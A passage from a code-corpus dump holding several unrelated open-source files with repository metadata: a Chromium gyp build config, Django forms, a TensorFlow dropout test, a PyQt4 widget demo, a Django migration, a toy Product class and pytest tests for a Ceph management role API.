'cflags!': [
'-Wextra',
],
'sources': [
'third_party/xdg_mime/xdgmime.c',
'third_party/xdg_mime/xdgmime.h',
'third_party/xdg_mime/xdgmimealias.c',
'third_party/xdg_mime/xdgmimealias.h',
'third_party/xdg_mime/xdgmimecache.c',
'third_party/xdg_mime/xdgmimecache.h',
'third_party/xdg_mime/xdgmimeglob.c',
'third_party/xdg_mime/xdgmimeglob.h',
'third_party/xdg_mime/xdgmimeicon.c',
'third_party/xdg_mime/xdgmimeicon.h',
'third_party/xdg_mime/xdgmimeint.c',
'third_party/xdg_mime/xdgmimeint.h',
'third_party/xdg_mime/xdgmimemagic.c',
'third_party/xdg_mime/xdgmimemagic.h',
'third_party/xdg_mime/xdgmimeparent.c',
'third_party/xdg_mime/xdgmimeparent.h',
],
'includes': [
'../build/android/increase_size_for_speed.gypi',
],
},
],
}],
['OS == "linux"', {
'targets': [
{
'target_name': 'malloc_wrapper',
'type': 'shared_library',
'dependencies': [
'base',
],
'sources': [
'test/malloc_wrapper.cc',
],
}
],
}],
['OS == "android"', {
'targets': [
{
# GN: //base:base_jni_headers
'target_name': 'base_jni_headers',
'type': 'none',
'sources': [
'android/java/src/org/chromium/base/ApkAssets.java',
'android/java/src/org/chromium/base/ApplicationStatus.java',
'android/java/src/org/chromium/base/AnimationFrameTimeHistogram.java',
'android/java/src/org/chromium/base/BuildInfo.java',
'android/java/src/org/chromium/base/CommandLine.java',
'android/java/src/org/chromium/base/ContentUriUtils.java',
'android/java/src/org/chromium/base/ContextUtils.java',
'android/java/src/org/chromium/base/CpuFeatures.java',
'android/java/src/org/chromium/base/EventLog.java',
'android/java/src/org/chromium/base/FieldTrialList.java',
'android/java/src/org/chromium/base/ImportantFileWriterAndroid.java',
'android/java/src/org/chromium/base/JNIUtils.java',
'android/java/src/org/chromium/base/JavaHandlerThread.java',
'android/java/src/org/chromium/base/LocaleUtils.java',
'android/java/src/org/chromium/base/MemoryPressureListener.java',
'android/java/src/org/chromium/base/PathService.java',
'android/java/src/org/chromium/base/PathUtils.java',
'android/java/src/org/chromium/base/PowerMonitor.java',
'android/java/src/org/chromium/base/SysUtils.java',
'android/java/src/org/chromium/base/SystemMessageHandler.java',
'android/java/src/org/chromium/base/ThreadUtils.java',
'android/java/src/org/chromium/base/TraceEvent.java',
'android/java/src/org/chromium/base/library_loader/LibraryLoader.java',
'android/java/src/org/chromium/base/metrics/RecordHistogram.java',
'android/java/src/org/chromium/base/metrics/RecordUserAction.java',
],
'variables': {
'jni_gen_package': 'base',
},
'dependencies': [
'android_runtime_jni_headers',
],
'includes': [ '../build/jni_generator.gypi' ],
},
{
# GN: //base:android_runtime_jni_headers
'target_name': 'android_runtime_jni_headers',
'type': 'none',
'variables': {
'jni_gen_package': 'base',
'input_java_class': 'java/lang/Runtime.class',
},
'includes': [ '../build/jar_file_jni_generator.gypi' ],
},
{
# GN: //base:base_unittests_jni_headers
'target_name': 'base_unittests_jni_headers',
'type': 'none',
'sources': [
'test/android/java/src/org/chromium/base/ContentUriTestUtils.java',
'test/android/java/src/org/chromium/base/TestUiThread.java',
],
'variables': {
'jni_gen_package': 'base',
},
'includes': [ '../build/jni_generator.gypi' ],
},
{
# GN: //base:base_native_libraries_gen
'target_name': 'base_native_libraries_gen',
'type': 'none',
'sources': [
'android/java/templates/NativeLibraries.template',
],
'variables': {
'package_name': 'org/chromium/base/library_loader',
'template_deps': [],
},
'includes': [ '../build/android/java_cpp_template.gypi' ],
},
{
# GN: //base:base_multidex_gen
'target_name': 'base_multidex_gen',
'type': 'none',
'sources': [
'android/java/templates/ChromiumMultiDex.template',
],
'variables': {
'package_name': 'org/chromium/base/multidex',
'template_deps': [],
'additional_gcc_preprocess_options': [
'--defines', 'MULTIDEX_CONFIGURATION_<(CONFIGURATION_NAME)',
],
},
'includes': ['../build/android/java_cpp_template.gypi'],
},
{
# GN: //base:base_android_java_enums_srcjar
'target_name': 'base_java_library_process_type',
'type': 'none',
'variables': {
'source_file': 'android/library_loader/library_loader_hooks.h',
},
'includes': [ '../build/android/java_cpp_enum.gypi' ],
},
{
# GN: //base:base_java
'target_name': 'base_java',
'type': 'none',
'variables': {
'java_in_dir': 'android/java',
'jar_excluded_classes': [ '*/NativeLibraries.class' ],
},
'dependencies': [
'base_java_application_state',
'base_java_library_load_from_apk_status_codes',
'base_java_library_process_type',
'base_java_memory_pressure_level',
'base_multidex_gen',
'base_native_libraries_gen',
'../third_party/android_tools/android_tools.gyp:android_support_multidex_javalib',
'../third_party/jsr-305/jsr-305.gyp:jsr_305_javalib',
],
'includes': [ '../build/java.gypi' ],
},
{
# GN: //base:base_java_unittest_support
'target_name': 'base_java_unittest_support',
'type': 'none',
'dependencies': [
'base_java',
],
'variables': {
'java_in_dir': '../base/test/android/java',
},
'includes': [ '../build/java.gypi' ],
},
{
# GN: //base:base_android_java_enums_srcjar
'target_name': 'base_java_application_state',
'type': 'none',
'variables': {
'source_file': 'android/application_status_listener.h',
},
'includes': [ '../build/android/java_cpp_enum.gypi' ],
},
{
# GN: //base:base_android_java_enums_srcjar
'target_name': 'base_java_library_load_from_apk_status_codes',
'type': 'none',
'variables': {
'source_file': 'android/library_loader/library_load_from_apk_status_codes.h'
},
'includes': [ '../build/android/java_cpp_enum.gypi' ],
},
{
# GN: //base:base_android_java_enums_srcjar
'target_name': 'base_java_memory_pressure_level',
'type': 'none',
'variables': {
'source_file': 'memory/memory_pressure_listener.h',
},
'includes': [ '../build/android/java_cpp_enum.gypi' ],
},
{
# GN: //base:base_java_test_support
'target_name': 'base_java_test_support',
'type': 'none',
'dependencies': [
'base_java',
'../testing/android/on_device_instrumentation.gyp:reporter_java',
],
'variables': {
'java_in_dir': '../base/test/android/javatests',
},
'includes': [ '../build/java.gypi' ],
},
{
# TODO(jbudorick): Remove this once we roll to robolectric 3.0 and pull
# in the multidex shadow library. crbug.com/522043
# GN: //base:base_junit_test_support
'target_name': 'base_junit_test_support',
'type': 'none',
'dependencies': [
'../testing/android/junit/junit_test.gyp:junit_test_support',
'../third_party/android_tools/android_tools.gyp:android_support_multidex_javalib',
],
'variables': {
'src_paths': [
'../base/test/android/junit/src/org/chromium/base/test/shadows/ShadowMultiDex.java',
],
},
'includes': [ '../build/host_jar.gypi' ]
},
{
# GN: //base:base_junit_tests
'target_name': 'base_junit_tests',
'type': 'none',
'dependencies': [
'base_java',
'base_java_test_support',
'base_junit_test_support',
'../testing/android/junit/junit_test.gyp:junit_test_support',
],
'variables': {
'main_class': 'org.chromium.testing.local.JunitTestMain',
'src_paths': [
'../base/android/junit/',
'../base/test/android/junit/src/org/chromium/base/test/util/DisableIfTest.java',
],
},
'includes': [ '../build/host_jar.gypi' ],
},
{
# GN: //base:base_javatests
'target_name': 'base_javatests',
'type': 'none',
'dependencies': [
'base_java',
'base_java_test_support',
],
'variables': {
'java_in_dir': '../base/android/javatests',
},
'includes': [ '../build/java.gypi' ],
},
{
# GN: //base/android/linker:chromium_android_linker
'target_name': 'chromium_android_linker',
'type': 'shared_library',
'sources': [
'android/linker/android_dlext.h',
'android/linker/legacy_linker_jni.cc',
'android/linker/legacy_linker_jni.h',
'android/linker/linker_jni.cc',
'android/linker/linker_jni.h',
'android/linker/modern_linker_jni.cc',
'android/linker/modern_linker_jni.h',
],
# The crazy linker is never instrumented.
'cflags!': [
'-finstrument-functions',
],
'dependencies': [
# The NDK contains the crazy_linker here:
# '<(android_ndk_root)/crazy_linker.gyp:crazy_linker'
# However, we use our own fork. See bug 384700.
'../third_party/android_crazy_linker/crazy_linker.gyp:crazy_linker',
],
},
{
# GN: //base:base_perftests_apk
'target_name': 'base_perftests_apk',
'type': 'none',
'dependencies': [
'base_perftests',
],
'variables': {
'test_suite_name': 'base_perftests',
},
'includes': [ '../build/apk_test.gypi' ],
},
{
# GN: //base:base_unittests_apk
'target_name': 'base_unittests_apk',
'type': 'none',
'dependencies': [
'base_java',
'base_unittests',
],
'variables': {
'test_suite_name': 'base_unittests',
'isolate_file': 'base_unittests.isolate',
},
'includes': [ '../build/apk_test.gypi' ],
},
],
'conditions': [
['test_isolation_mode != "noop"',
{
'targets': [
{
'target_name': 'base_unittests_apk_run',
'type': 'none',
'dependencies': [
'base_unittests_apk',
],
'includes': [
'../build/isolate.gypi',
],
'sources': [
'base_unittests_apk.isolate',
],
},
]
}
],
],
}],
['OS == "win"', {
'targets': [
{
# Target to manually rebuild pe_image_test.dll which is checked into
# base/test/data/pe_image.
'target_name': 'pe_image_test',
'type': 'shared_library',
'sources': [
'win/pe_image_test.cc',
],
'msvs_settings': {
'VCLinkerTool': {
'SubSystem': '2', # Set /SUBSYSTEM:WINDOWS
'DelayLoadDLLs': [
'cfgmgr32.dll',
'shell32.dll',
],
'AdditionalDependencies': [
'cfgmgr32.lib',
'shell32.lib',
],
},
},
},
],
}],
['test_isolation_mode != "noop"', {
'targets': [
{
'target_name': 'base_unittests_run',
'type': 'none',
'dependencies': [
'base_unittests',
],
'includes': [
'../build/isolate.gypi',
],
'sources': [
'base_unittests.isolate',
],
},
],
}],
],
}
| [
"Justin"
] | Justin |
00c249df496d497a62d7988f77d4d095b9b8644e | 925f6b2376bcdcf175194b4f390beeffb57d67e0 | /sosmypc/sosmypc/core/forms.py | c69f02eae6de9e7a5494462446fa674876afd469 | [] | no_license | CoutinhoElias/sosmypc | a0a86f0c05f5f0d6e0beb3a7b22da73ed8951ac4 | ce77520f0e7fe33441de030f85c85c4fccce8afb | refs/heads/master | 2021-01-18T23:21:22.377626 | 2016-06-02T18:07:27 | 2016-06-02T18:07:27 | 53,994,124 | 1 | 1 | null | 2016-05-18T19:29:35 | 2016-03-16T02:23:09 | JavaScript | UTF-8 | Python | false | false | 6,118 | py | import datetime as datetime
from django import forms
from django.contrib.auth.forms import UserCreationForm
from material import Layout, Row, Fieldset, Span3, Span2, Span10, Span8, Span7, Span5
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout
from .models import ProfissoesPessoa, Qualificacao
from django_addanother.widgets import AddAnotherWidgetWrapper
from django.core.urlresolvers import reverse_lazy
class LoginForm(forms.Form):
username = forms.CharField(max_length=30,label="Nome")
email = forms.EmailField(label="E-mail")
password = forms.CharField(widget=forms.PasswordInput,label="Senha")
class RegistrationForm(forms.Form, UserCreationForm):
username = forms.CharField(max_length=30,required=True,label='Login')
email = forms.EmailField(label="E-mail",required=True)
#senha = forms.CharField(widget=forms.PasswordInput,label='Senha')
#confirma_senha = forms.CharField(widget=forms.PasswordInput, label="Confirmar senha")
nome = forms.CharField(required=True,label='Nome Completo')
cep = forms.IntegerField(max_value=99999999,required=True,label='CEP')
#tipo_logradouro = forms.CharField(required=True,label='Tipo')
logradouro = forms.CharField(required=True,label='Logradouro')
numero = forms.CharField(required=True,label='Número')
bairro = forms.CharField(required=True,label='Bairro')
cidade = forms.CharField(required=True,label='Cidade')
estado = forms.CharField(required=True,label='UF')
#last_name = forms.CharField(required=True, label='Último nome')
#gender = forms.ChoiceField(choices=((None, ''), ('F', 'Feminino'), ('M', 'Masculino'), ('O', 'Outro')),label='Gênero',required=False)
profissional = forms.BooleanField(required=False, label='Sou profissional.')
agree_toc = forms.BooleanField(required=True, label='Eu aceito os termos e condições de uso.')
layout = Layout(
Fieldset('Cadastrar em SOS my PC',
'username','email',
Row('password1', 'password2')),
Fieldset('Dados Pessoais','nome',
Row(Span2('cep'),# Span2('tipo_logradouro'),
Span8('logradouro'),Span2('numero')),
Row(Span5('bairro'),Span5('cidade'),Span2('estado')) ),
'profissional', 'agree_toc')
class CommentForm(forms.Form):
nome = forms.CharField(required=True,label='Nome Completo')
email=forms.EmailField(label="E-mail",required=True)
mensagem=forms.CharField(required=True,label='Comentário',widget=forms.Textarea)
class UserForm(forms.Form):
username = forms.CharField(label="Nome usuário", max_length=32, widget=forms.TextInput(
attrs={'class': 'form-control input-lg'}))
email = forms.EmailField(max_length=32, widget=forms.EmailInput(
attrs={'class': 'form-control input-lg'}))
#password = forms.CharField(label="Senha", max_length=32, widget=forms.PasswordInput(
#attrs={'class': 'form-control input-lg'}))
first_name = forms.CharField(label="Primeiro nome", max_length=32, widget=forms.TextInput(
attrs={'class': 'form-control input-lg'}))
last_name = forms.CharField(label="Sobrenome", max_length=32, widget=forms.TextInput(
attrs={'class': 'form-control input-lg'}))
is_staff = forms.BooleanField(label="É usuário do sistema?", initial=False)
is_superuser = forms.BooleanField(label="É Administrador do sistema?", initial=False)
class ProfissaoForm(forms.Form):#Atualmente sem uso.
profissao = forms.CharField(max_length=30,label="Profissao")
class ProfissoesPessoaForm(forms.Form): #Atualmente sem uso.
pessoa = forms.CharField(max_length=30,label="Pessoa")
profissao = forms.CharField(max_length=30,label="Profissao")
rating = forms.IntegerField(label="Rating")
layout = Layout(
'pessoa',
Row('profissao', 'rating'))
# @property #Trabalhando com modal | Primeiro declara esta função abaixo:
# def helper(self):
# helper = FormHelper()
# helper.form_tag = False # don't render form DOM element
# helper.render_unmentioned_fields = True # render all fields
# helper.label_class = 'col-md-2'
# helper.field_class = 'col-md-10'
# return helper
class ProfissoesPessoaModelForm(forms.ModelForm):
class Meta:
model = ProfissoesPessoa
fields = '__all__'
layout = Layout(
'pessoa',
Row('profissao', 'rating'))
# class QualificacaoModelForm(forms.ModelForm):
# class Meta:
# model = Qualificacao
# fields = ['descricao']
# widgets = {
# 'groups': AddAnotherWidgetWrapper(
# forms.SelectMultiple,
# reverse_lazy('add_qualificacao'),
# )
# }
"""Passos para trabalhar com django rest
1 - pip install djangorestframework
2 - pip instal httpie
3 - No Setting do projeto antes de suas apps insira 'rest_framework',
4 - No urls.py chame assim:
url(r'^pessoas/all/', all_pessoas)
5 - Na pasta do projeto (Neste caso a pasta core onde se encontram os arquivos views, forms, apps e models.py
vamos criar um arquivo chamado serializers.py
Neste arquivo vamos colocar o código abaixo:
from rest_framework import serializers
from core.models import *
class PessoaSerializer(serializes. ModelSerializer):
class Meta:
model = Pessoa
fields = ('pk', ...)
Repita isso para cada classe do models.py
6 - Na views.py vamos fazer os seguintes passos:
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from rest_framework.renderes import JSONRenderer
from rest_framework.renderes import Response
from rest_framework.decorators import api_view
from Pessoa.serializers import *
@api_view(['GET'])
def all_Pessoas(request, **kwargs):
pessoas = Pessoa.objects.all()
serializers = PessoaSerializer(pessoas, many=True)
return Response(serializers.data)
"""
| [
"coutinho.elias@gmail.com"
] | coutinho.elias@gmail.com |
cd9eca8fdea4985097b9053005381853c3e81a01 | 49536aafb22a77a6caf249c7fadef46d63d24dfe | /tensorflow/tensorflow/contrib/nn/python/ops/alpha_dropout_test.py | a46269392668d58794c05b147c0b616940dd905c | [
"Apache-2.0"
] | permissive | wangzhi01/deeplearning-1 | 4e5ad93f0d9ecd302b74352f80fe1fa6ae70bf0d | 46ab82253d956953b8aa98e97ceb6cd290e82288 | refs/heads/master | 2020-05-28T03:14:55.687567 | 2018-09-12T16:52:09 | 2018-09-12T16:52:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,629 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for sampling_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.nn.python.ops.alpha_dropout import alpha_dropout
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import nn_impl
from tensorflow.python.platform import test
class AlphaDropoutTest(test.TestCase):
def testAlphaDropout(self):
x_dim, y_dim = 40, 30
for keep_prob in [0.1, 0.5, 0.8]:
with self.test_session():
t = random_ops.random_normal([x_dim, y_dim])
output = alpha_dropout(t, keep_prob)
self.assertEqual([x_dim, y_dim], output.get_shape())
t_mean, t_std = nn_impl.moments(t, axes=[0, 1])
output_mean, output_std = nn_impl.moments(output, axes=[0, 1])
self.assertLess(abs(t_mean.eval() - output_mean.eval()), 0.1)
self.assertLess(abs(t_std.eval() - output_std.eval()), 0.1)
def testShapedDropoutShapeError(self):
# Runs shaped dropout and verifies an error is thrown on misshapen noise.
x_dim = 40
y_dim = 30
keep_prob = 0.5
t = constant_op.constant(1.0, shape=[x_dim, y_dim], dtype=dtypes.float32)
with self.assertRaises(ValueError):
_ = alpha_dropout(t, keep_prob, noise_shape=[x_dim, y_dim + 10])
with self.assertRaises(ValueError):
_ = alpha_dropout(t, keep_prob, noise_shape=[x_dim, y_dim, 5])
with self.assertRaises(ValueError):
_ = alpha_dropout(t, keep_prob, noise_shape=[x_dim + 3])
with self.assertRaises(ValueError):
_ = alpha_dropout(t, keep_prob, noise_shape=[x_dim])
# test that broadcasting proceeds
_ = alpha_dropout(t, keep_prob, noise_shape=[y_dim])
_ = alpha_dropout(t, keep_prob, noise_shape=[1, y_dim])
_ = alpha_dropout(t, keep_prob, noise_shape=[x_dim, 1])
_ = alpha_dropout(t, keep_prob, noise_shape=[1, 1])
def testInvalidKeepProb(self):
x_dim, y_dim = 40, 30
t = constant_op.constant(1.0, shape=[x_dim, y_dim], dtype=dtypes.float32)
with self.assertRaises(ValueError):
alpha_dropout(t, -1.0)
with self.assertRaises(ValueError):
alpha_dropout(t, 1.1)
with self.assertRaises(ValueError):
alpha_dropout(t, [0.0, 1.0])
with self.assertRaises(ValueError):
alpha_dropout(t, array_ops.placeholder(dtypes.float64))
with self.assertRaises(ValueError):
alpha_dropout(t, array_ops.placeholder(dtypes.float32, shape=[2]))
def testNoDropoutFast(self):
x = array_ops.zeros((5,))
for p in 1, constant_op.constant(1.0):
y = alpha_dropout(x, keep_prob=p)
self.assertTrue(x is y)
if __name__ == '__main__':
test.main()
| [
"hanshuobest@163.com"
] | hanshuobest@163.com |
b275fe795cf9ab1470d80878cc1dcd2f8bff4dfb | 2e7fa13a40dafa81c5852b7a9d70555c45814574 | /QT/pyqt/Qline_Edit.py | 84efff4077167ce8cc0584f2f562a6c1388a02b6 | [] | no_license | Ziaeemehr/miscellaneous | 5768c6f5a2fe76468faed4283a3572a44ccd0239 | 43a62aaa28c577b09f605a135818a2dacc75d67c | refs/heads/master | 2021-07-24T02:43:51.032849 | 2020-09-23T06:17:17 | 2020-09-23T06:17:17 | 217,556,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,161 | py | import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
def window():
app = QApplication(sys.argv)
win = QWidget()
e1 = QLineEdit()
e1.setValidator(QIntValidator())
e1.setMaxLength(4)
e1.setAlignment(Qt.AlignRight)
e1.setFont(QFont("Arial",20))
e2 = QLineEdit()
e2.setValidator(QDoubleValidator(0.99,99.99,2))
flo = QFormLayout()
flo.addRow("integer validator", e1)
flo.addRow("Double validator",e2)
e3 = QLineEdit()
e3.setInputMask('+99_9999_999999')
flo.addRow("Input Mask",e3)
e4 = QLineEdit()
e4.textChanged.connect(textchanged)
flo.addRow("Text changed",e4)
e5 = QLineEdit()
e5.setEchoMode(QLineEdit.Password)
flo.addRow("Password",e5)
e6 = QLineEdit("Hello Python")
e6.setReadOnly(True)
flo.addRow("Read Only",e6)
e5.editingFinished.connect(enterPress)
win.setLayout(flo)
win.setWindowTitle("PyQt")
win.show()
sys.exit(app.exec_())
def textchanged(text):
print "contents of text box: "+text
def enterPress():
print "edited"
if __name__ == '__main__':
window() | [
"a.ziaeemehr@gmail.com"
] | a.ziaeemehr@gmail.com |
7be4d69ad6872e1ec239fc9e76020f4128811aa0 | a0f7cd0dac6b24ca8f0eb26e13f55e7d3bfd6073 | /tutorgame/regexapp/migrations/0001_initial.py | 5fcf0d31f6456839a59a6d71d3b5d49dd99c32ce | [] | no_license | tomaccosheep/capstone-draft-7 | 217d0e279c7a3a25207f084ee5f148de5815fe0c | 0a66c24397d2c0d4878a057c6bdd21a1009b15b6 | refs/heads/master | 2021-01-22T17:49:05.881406 | 2017-08-14T19:00:19 | 2017-08-14T19:00:19 | 102,405,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-13 18:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Card_Manager',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('unique_id', models.CharField(max_length=32)),
],
),
]
| [
"al.burns.email@gmail.com"
] | al.burns.email@gmail.com |
a8ff5cf0bc6c164790c98a11d4fee5fbabbc3acc | 669be04e813baf7ac5a444ff9197237a8674126d | /product.py | 0fec1a80bb34ec37fb8020167d1acab1e59d7db0 | [] | no_license | vangali12/PythonOOP | d24d588eddfa6b03919dd6735b8bf3c898630425 | 579d365981b9d1520ec88dcbfe52147745be94ef | refs/heads/master | 2021-07-08T04:07:00.184547 | 2017-10-05T19:07:37 | 2017-10-05T19:07:37 | 105,929,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,131 | py | class Product(object):
def __init__(self, price, name, weight, brand, cost):
self.price = price
self.name = name
self.weight = weight
self.brand = brand
self.cost = cost
self.status = "sale"
def sell(self):
self.status = "sold"
return self
def addTax(self, tax):
self.price = self.price + (self.price * tax)
return self
def returnItem(self, reason):
if (reason is "defective"):
self.status = "defective"
self.price = 0
return self
if (reason is "new"):
self.status = "sale"
return self
if (reason is "opened"):
self.status = "used"
self.price = float((self.price * 0.8))
return self
def displayInfo(self):
print("Price: " + str(self.price))
print("Name: " + self.name)
print("Weight: " + self.weight)
print("Brand " + self.brand)
print("Cost: " + str(self.cost))
print("Status: " + self.status)
#item1 = Product(21, "strawberries", "1lb", "Driscoll's", 5)
#item1.displayInfo()
#item1.sell().displayInfo()
#item1.addTax(0.1).displayInfo()
#item1.returnItem("defective").displayInfo()
#item1.returnItem("new").displayInfo()
#item1.returnItem("opened").displayInfo() | [
"30483940+vangali12@users.noreply.github.com"
] | 30483940+vangali12@users.noreply.github.com |
311c308c4f86c1fc335a834b79971196dc1408b7 | f000fa4e6ef1de9591eeabff43ba57b7bf32561d | /tests/api/views/v1/test_api_role.py | 93c7a8cc9a38f118dfa72b73518a74bbaa4126b7 | [] | no_license | VictorDenisov/ceph-lcm | 1aca07f2d17bfda8760d192ffd6d17645705b6e4 | 3cfd9ced6879fca1c39039e195d22d897ddcde80 | refs/heads/master | 2021-01-15T09:19:23.723613 | 2016-09-17T01:18:45 | 2016-09-17T01:18:45 | 68,424,913 | 0 | 0 | null | 2016-09-17T01:17:36 | 2016-09-17T01:17:36 | null | UTF-8 | Python | false | false | 10,881 | py | # -*- coding: utf-8 -*-
"""This module has tests for /v1/role API."""
import uuid
import pytest
from cephlcm.common.models import role
@pytest.fixture
def mongo_collection(pymongo_connection):
return pymongo_connection.db.role
@pytest.fixture
def clean_role_collection(mongo_collection, sudo_role):
mongo_collection.remove({"_id": {"$ne": sudo_role._id}})
@pytest.fixture
def valid_request(sudo_role):
return {
"name": pytest.faux.gen_alphanumeric(),
"permissions": sudo_role.permissions
}
def add_permission_to_user(client, user_model, permissions):
role_data = user_model.role.make_api_structure()
role_data["data"]["permissions"] = permissions
response = client.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
assert response.status_code == 200
@pytest.fixture
def normal_user_with_role(normal_user, sudo_user):
new_role = role.RoleModel.make_role(pytest.faux.gen_alphanumeric(), [],
sudo_user.model_id)
normal_user.role_id = new_role.model_id
normal_user.save()
return normal_user
def test_api_get_access(sudo_client_v1, client_v1, sudo_user, freeze_time):
response = client_v1.get("/v1/role/")
assert response.status_code == 401
assert response.json["error"] == "Unauthorized"
response = sudo_client_v1.get("/v1/role/")
assert response.status_code == 200
def test_api_create_model(client_v1, sudo_client_v1, valid_request,
mongo_collection, sudo_user, freeze_time):
response = client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 401
assert response.json["error"] == "Unauthorized"
response = sudo_client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 200
db_role = mongo_collection.find_one({"model_id": response.json["id"]})
assert db_role
assert response.json["id"] == db_role["model_id"]
assert response.json["initiator_id"] == db_role["initiator_id"]
assert response.json["time_updated"] == db_role["time_created"]
assert response.json["time_deleted"] == db_role["time_deleted"]
assert response.json["version"] == db_role["version"]
assert response.json["data"]["name"] == db_role["name"]
assert response.json["data"]["permissions"] == db_role["permissions"]
assert response.json["time_updated"] == int(freeze_time.return_value)
assert response.json["initiator_id"] == sudo_user.model_id
assert response.json["model"] == "role"
assert response.json["version"] == 1
assert response.json["data"]["name"] == valid_request["name"]
assert response.json["data"]["permissions"] == valid_request["permissions"]
@pytest.mark.parametrize("name", (1, {}, [], None))
def test_api_create_broken_parameter(name, sudo_client_v1, valid_request):
valid_request["name"] = name
response = sudo_client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 400
@pytest.mark.parametrize("prm", (1, str(uuid.uuid4()), {}, [], None))
def test_api_create_role_broken_permission(prm, sudo_client_v1, valid_request):
valid_request["permissions"]["api"].append(prm)
response = sudo_client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 400
def test_api_create_role_unknown_class(sudo_client_v1, sudo_role,
valid_request):
valid_request["permissions"][pytest.faux.gen_alpha()] = []
response = sudo_client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 400
def test_add_permission_to_role(client_v1, sudo_client_v1, sudo_role,
valid_request):
valid_request["permissions"]["api"] = []
response = sudo_client_v1.post("/v1/role/", data=valid_request)
model = response.json
model["data"]["permissions"]["api"] = [sudo_role.permissions["api"][0]]
resp = client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 401
resp = sudo_client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 200
assert resp.json["id"] == response.json["id"]
assert resp.json["version"] == response.json["version"] + 1
assert resp.json["data"] == model["data"]
def test_remove_permission_from_role(client_v1, sudo_client_v1, sudo_role,
valid_request):
response = sudo_client_v1.post("/v1/role/", data=valid_request)
model = response.json
model["data"]["permissions"]["api"] = [sudo_role.permissions["api"][0]]
resp = client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 401
resp = sudo_client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 200
assert resp.json["id"] == response.json["id"]
assert resp.json["version"] == response.json["version"] + 1
assert resp.json["data"] == model["data"]
def test_update_name(client_v1, sudo_client_v1, valid_request):
response = sudo_client_v1.post("/v1/role/", data=valid_request)
model = response.json
model["data"]["name"] = pytest.faux.gen_alphanumeric()
resp = client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 401
resp = sudo_client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 200
assert resp.json["id"] == response.json["id"]
assert resp.json["version"] == response.json["version"] + 1
assert resp.json["data"] == model["data"]
def test_add_permission_to_user_view_user(
client_v1, sudo_client_v1, normal_user_with_role, sudo_role, valid_request
):
client_v1.login(normal_user_with_role.login, "qwerty")
response = client_v1.get("/v1/role/")
assert response.status_code == 403
response = client_v1.get("/v1/role/{0}/".format(sudo_role.model_id))
assert response.status_code == 403
response = client_v1.get(
"/v1/role/{0}/version/".format(sudo_role.model_id)
)
assert response.status_code == 403
response = client_v1.get(
"/v1/role/{0}/version/1/".format(sudo_role.model_id)
)
assert response.status_code == 403
add_permission_to_user(
sudo_client_v1, normal_user_with_role, {
"api": ["view_role", "view_role_versions"]
}
)
response = client_v1.get("/v1/role/")
assert response.status_code == 200
response = client_v1.get("/v1/role/{0}/".format(sudo_role.model_id))
assert response.status_code == 200
response = client_v1.get(
"/v1/role/{0}/version/".format(sudo_role.model_id)
)
assert response.status_code == 200
response = client_v1.get(
"/v1/role/{0}/version/1/".format(sudo_role.model_id)
)
assert response.status_code == 200
def test_add_role_to_user_view_user(
client_v1, sudo_client_v1, normal_user_with_role, sudo_role, valid_request
):
client_v1.login(normal_user_with_role.login, "qwerty")
response = client_v1.get("/v1/role/")
assert response.status_code == 403
response = client_v1.get("/v1/role/{0}/".format(sudo_role.model_id))
assert response.status_code == 403
response = client_v1.get(
"/v1/role/{0}/version/".format(sudo_role.model_id)
)
assert response.status_code == 403
response = client_v1.get(
"/v1/role/{0}/version/1/".format(sudo_role.model_id)
)
assert response.status_code == 403
normal_user_with_role.role_id = sudo_role.model_id
normal_user_with_role.save()
response = client_v1.get("/v1/role/")
assert response.status_code == 200
response = client_v1.get("/v1/role/{0}/".format(sudo_role.model_id))
assert response.status_code == 200
response = client_v1.get(
"/v1/role/{0}/version/".format(sudo_role.model_id)
)
assert response.status_code == 200
response = client_v1.get(
"/v1/role/{0}/version/1/".format(sudo_role.model_id)
)
assert response.status_code == 200
def test_add_permission_to_create_user(client_v1, sudo_client_v1, sudo_role,
normal_user_with_role, valid_request):
client_v1.login(normal_user_with_role.login, "qwerty")
response = client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 403
add_permission_to_user(
sudo_client_v1, normal_user_with_role,
{"api": ["view_role", "create_role"]}
)
response = client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 200
def test_add_permission_to_edit_user(client_v1, sudo_client_v1, sudo_role,
normal_user_with_role, valid_request):
